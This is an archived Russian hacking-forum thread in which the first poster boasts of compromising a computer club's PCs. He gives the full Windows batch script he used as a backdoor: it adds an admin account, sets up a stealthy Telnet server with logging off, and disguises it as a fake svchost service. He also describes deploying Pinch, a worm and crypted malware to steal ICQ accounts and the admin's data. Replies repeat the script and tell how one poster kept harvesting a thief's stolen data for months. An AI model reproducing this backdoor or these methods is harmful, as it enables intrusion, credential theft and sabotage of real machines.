PDA

Просмотр полной версии : Взлом компьютерного клуба.


m9chik
13.08.2008, 16:15
В этой статье я просто хочу расскать как я поимел компьюерный клуб.

Есть очень много вариантов взлома клуба,очень. сначало просто самые простые и самые палевные.

1.Вы можите принести usb флешку и сказать что тама находиться фотографии и т.д. или мне надо на неё скачать что либо,у нас в клубе это не прокатывало,такчто можно было получить пинка по голове.

2. Этот вариант впринципе такойже как и 1 токо в деле играют наушники, садишся за стол,двигаеш коробочку,помимо наушников встовляеш флэшку,но и это могут пропалить.

3.Можно тупо принести пинч на дискете админу и сказать "Ну чо зассал открыть?"
p.s. тута можно заранее давать драпу :)

Впринципе всё.

У нас в клубе когда он был была очень хорошая защита и очень палева было много потомучто стол админа находился по верх всех и выгледело примерно так.
http://s44.radikal.ru/i104/0808/4d/8fbefe733dd5.jpg (http://www.radikal.ru)

Поясню может в других компьютерных клубах всё по другому но у нас строже,ничё не принес,заплатил сел,играй и лазий в инете.Также поставили недавненько защиту против всяких сайтов,хрен знает почему,но дейстовало эфективно,админ сразу вставал шол к компу и орал матом,потомучто ему заколебали всплывающие окошки :)

И так...
Был както день плохой,решил сходить в компы...
Тута я начал выберать места для своей коварной мысли поиметь эти сраные компы.
Выбрал "15" потомучто за "16" сидел толстый мужик,и меня не видно было бы,и так как сел немного порубал в игры и начал осматриваться что как...
Увидел что при переписки всего компьютерного клуба в qip сохроняеться в недры какихто странных папок,уже мысль была поднята что сеть кабельная доступ открыт для любому, начал дальше осматриваца я уже разочеровался,потомучто очень много тама нельзя было делать...
Поэтому я вспомнил след. win+R запуск программы,думал номер не пройдёт потомучто очень я боялся защиты... а тута как мёдом намазано вылетело окно :) след я вызвал Notepad и начал фигачить батник ...

@echo off
net localgroup TelnetClients /add
net user admin admin /add
net localgroup Administratoren admin /add
net localgroup TelnetClients admin /add
cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
ECHO "TelnetPort"=dword:000003F2>>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
assoc .exeя=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client


Этопростенький бэк дор который пишеться за щиттаные минуты...

p.s. не думайте что я такой задрот просто у меня в контакте я хроню все батники :) такчто я просто скопировал и всё...

Потом была проблема куда мне загонять,и я решил туда куда валяються все эти логи icq и т.д. такмже я его и запустил.
Впринципе я уже мог щитать что компы уже мои но я хотел очень хорошо повеселиться :)
дальше я пошол домой решил приконектиться через telnet всё было ок особо в то время я сним не дружил поэтому дома залепил прикольчик+пинча+червя+(это т же бэкдор)токо .exe криптанул мне оч хороший человек всё, дальше я залил на рапиду и пошол на след день в компы,получилось так что сел за другой,но ничо я быстро зашол на рапиду скачал этот мой вирусик и запустил, дальше я играл играл и играл,кончилось моё время я пошол домой:) я знал что компьютеров уже нету поскольку поставил задержу,на след день ихние компы никак не работали издавали визг каспирского и время летело со скоростью света )))

p.s. + ещё был в том что у меня под конторелм было сразу 2 машини :)

p.s. я получил около 40 тупых 9 значек, 2 уродские 7значки,зато получил всё об админе :)

p.s. хочу выделить большую благодарность antichat.ru поскольку это был мой самый большой и экстримальный ход :)

Использованные темы:
Pinch (http://forum.antichat.ru/thread19273.html)
Крипт (http://forum.antichat.ru/thread33678.html)
бэкдор (http://root-access.info/index.php?showtopic=3469&start=0&p=13937&#entry13937) Сразу извеняюсь,поскольку мою тему на ачате удалили.
Кузя (http://forum.antichat.ru/thread36437.html)

~Real F@ck!~
13.08.2008, 16:25
Бля лольная история, еле осилил... всё гораздо проще и лучше.

OMG!!
13.08.2008, 18:29
Да.. Митник нервно курит в сторонке )))) Молодец

ProTeuS
13.08.2008, 18:55
действительно о4ень экстремальный взлом

Dr.Bodja
13.08.2008, 19:27
Есть метод намного проще, достаёшь из-за спины АК-47, наводишь на админа, и "Ану быстро пароли от асек давай".
ЗЫ: А Вебкилл наверно, таким способом тоже ламает интернет.

Sn@k3
13.08.2008, 20:39
Опасен, я тоже как-то поимел два рядом стоящих комп клубов и один магазин, где компы стоят, правда там мне реально приходилось бежать))) еле ноги унес, магазин багира.

m9chik
13.08.2008, 20:48
Опасен, я тоже как-то поимел два рядом стоящих комп клубов и один магазин, где компы стоят, правда там мне реально приходилось бежать))) еле ноги унес, магазин багира.
былобы интересно почитать как ты это зделал ;)

slider
13.08.2008, 21:23
Имха.... слаюшка интересней описал :


http://forum.antichat.ru/showthread.php?p=169220

Sn@k3
13.08.2008, 21:24
Ну если интересно, то расскажу про багиру
Ну вообщем обычный магазин, каких полно, отдел продаж, гарантийный отдел и т.д. все в одном месте, только в разных помещениях, ну вообще зашел в отдел продаж, смотрю комп стоит, я впринцыпе знал что там есть комп, в котором есть электронный каталог, ну типа выбираешь что есть чего нет ит.д. за столом был один менеджер, лет ~21 а мне на то время было 17(счас 19), ну вообщем стал за комп, загородил спиной(случайно, но прально что так сделал), вообщем у компа нет клавы, процессор тоже спратан, один монитор и мышь, я тупо тыкаю смотрю девайсы, и т.д. смотрю ссылка на веб сайт, улыбнувшись ткнул по ней, и тут открывается, о чудо, осел, типа ИЕ. =))) немного поскрипев, я нажал на файл, далее открыть, после нгажал обзор а там снова "о чудо =)" вообщем далее я решил включить консоль что и сделал. Далее решил какой-нить фейс оставить, т.к. инета небыло никакх мыслей что даже локалка есть(как позже выяснилось) нет, ну вообщем решил тупо оставить фейс в файле =)(а мне больше и не надо было =) ), т.к. путь был типа
C:\docum....\root\раб... то я решил выйти назад, по частям скопировал прям в консоле "cd" и две точки с заголовка "............-2001." вставил, значит я, хотел перейти назад, но тут понил что без интера не обойтись :D =))))))))))) тут меня облом полный настал....

вообщем закрыл эту байду всю и зашел на диск С (опять браузером:) ), после создал файл мышкой и собрав хоть и на русском законный фейс путем копирования букв с разных папок, время было затрачено минут 15, так что я уже почти закончил, тут кароче подскакивает менеджер со словами, "Вам помочь?", я переполошился и испугался, не успев закрыть все это, пришлось свалить со словами, "да нет, спасибо".

BloodyMessage
13.08.2008, 21:28
m9chik, Почитал, вобще интересно, + за старания :)

echobyte
13.08.2008, 21:50
В клюбах уже все давно пропинчено.. Везде мне встречаються админы-идиоты, у которых все через задницу.. :(

m9chik
13.08.2008, 21:52
ну да,этот клуб тоже не конфетка была,но всё таки... думаю взять с собой парочку человеков и сгонять в хороший клуб,недавно отстроили тама 2-ух ядерки,плазменные экраны,наушники и т.д. :) крутой по ходу...

Nurik
15.09.2008, 21:28
прикольно надо будет попробовать у себя у нас админ в клубе только и умеет что вребя ставить ну там просто работник Ddddd

Nurik
15.09.2008, 21:29
обоим +1 за интересные истории!)))

Fantasy
15.09.2008, 23:10
у нас в компах тож ппц ,админы дауны*,юзвери что хотят трворят...
.........bот кода я летом там работал в компах даж снизилась посещаемость) ......

Devoldini
15.09.2008, 23:31
Тупой вопрос, нус сорри :))
Расскажи подробнее, пожалуйста, зачем ты создавал это:

@echo off
net localgroup TelnetClients /add
net user admin admin /add
net localgroup Administratoren admin /add
net localgroup TelnetClients admin /add
cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
ECHO "TelnetPort"=dword:000003F2>>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
assoc .exeя=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client
И в каком виде ты его сохранил? Я так понял, этот файл для телнета? Чтобы можна зайти на комп? О_о

.AkeLLa
15.09.2008, 23:55
В клюбах уже все давно пропинчено..
Все места заняты :)

lilsaint
17.09.2008, 21:07
кульный розказ!!!!!!!

MyTy3
25.09.2008, 11:46
МЛЯ А НЕ ПРОЩЕ БЫЛО ОТОСЛАТЬ ПИНЧ НА ПОЧТУ А ПОТОМ ВОЙТИ В ПОЧТУ И СКАЧАТЬ ?? че за тупые у тя мозги

Sainer
28.09.2008, 13:41
)) тоже когда то работал админом еще со времен MPacka. Тоже заходит человек садиться за комп напротив меня, тоесть сидит ко мне задом. Он мне сразу не понравился, что то осматривался по сторонам все время на меня оглядывался. Я решил через админку последить чем он занимается, он пытался скачать и открыть свой пинч много способов перепробовал, а у нас прикол в том что можно запускать только ярлыки по директория лазить нельзя и блок стоит на функцию "Открыть файл" когда файл скачиваешь. Он рылься долго пока не нашел ФТП клиент. Повмыкал встал и ушел. Как прошло 2 часа приходит обратно я сразу понял что все слил уже на свою ФТПишку.
Я специально сказал типо сейчас переучет прийдите через 5-10 мин. За это время поставил кейлогер и еще пару софтинок. Посадил его на ту же машину и сижу дальше наблюдаю он справился за 5 мин запустил и ушел, радостный какой то))
Я зашел на его ФТП стоял там последний Mpack, лоадер и еще пару приват софтинок. Все само собой стырял и в лоадер добавил еще и своего пинча))
Он меня конкретно откармливал отчетами еще наверно месяца 3 с него чистых отчетов шло в пару раз больше чем со всех моих источников. Жестко мне понравилось ))

whyl
23.11.2008, 01:30
Что за проблема вставить флешку?????? Нахрен этот цирк с наушниками????
Если такой прохаванный лучше скажи как взломать Run Pad Shell